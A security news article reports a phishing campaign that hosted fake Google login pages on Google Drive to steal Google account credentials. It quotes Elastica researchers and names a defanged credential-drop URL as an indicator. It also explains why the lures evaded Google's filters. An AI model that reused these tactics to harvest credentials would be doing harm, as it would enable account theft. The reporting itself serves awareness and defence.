Once again phishers exploited Google’s reputation running a phishing campaign aimed to steal user Google credentials and access to the multitude services offered by the company.
The new phishing campaign was discovered by the security researcher Aditya K. Sood from Elastica Cloud Threat Labs. Also in this case phishers used phishing pages hosted on Google Drive that appear similar a Google log-in page and which was served over HTTPs. The use of HTTPS makes the web pages more realistic and less suspicious to victims.
This campaign has many similarities with a campaign discovered by experts at Symantec in March 2014, the malicious emails sent by the scammers presents the same subject “Document,” and the stolen credentials are hosted on a third-party server.
“Elastica Cloud Threat Labs recently discovered a new Google Drive phishing campaign in which an attacker deployed phishing web pages on Google Drive. This is not the first time Google Drive has been used for phishing purposes. Last year, the security community encountered a similar type of Google Drive phishing attack.” states the blog post published by Elastica Cloud Threat Labs.
The destination URL where the victim’s credentials are sent is hxxp://alarabia[.]my/images/Fresh/performact[.]php.
The phishers were mainly interested in siphon Google credentials of their victims as explained in the post.
“In an effort to maximize benefits, attackers targeted Google users specifically so as to gain access to the multitude of services associated with those accounts, since Google uses Single Sign On (SSO) procedures,” continues the post.
The experts noticed that phishing emails are able to avoid Google’s built-in detection capabilities, likely because they’re sent from a Gmail account and the embedded link points to a legitimate googledrive.com domain.
“When you open ‘drive.google.com,’ Google redirects the browser to ‘accounts.google.com’ which carries the message, ‘One Account. All of Google,’ whereas this web page highlights the message ‘Google Drive. One Storage,’ which is not legitimate,” Sood said. “However, users targeted in this campaign might not notice this.” explained Aditya K Sood from Elastica Cloud Threat Labs.
(Security Affairs – Google Drive, phishing)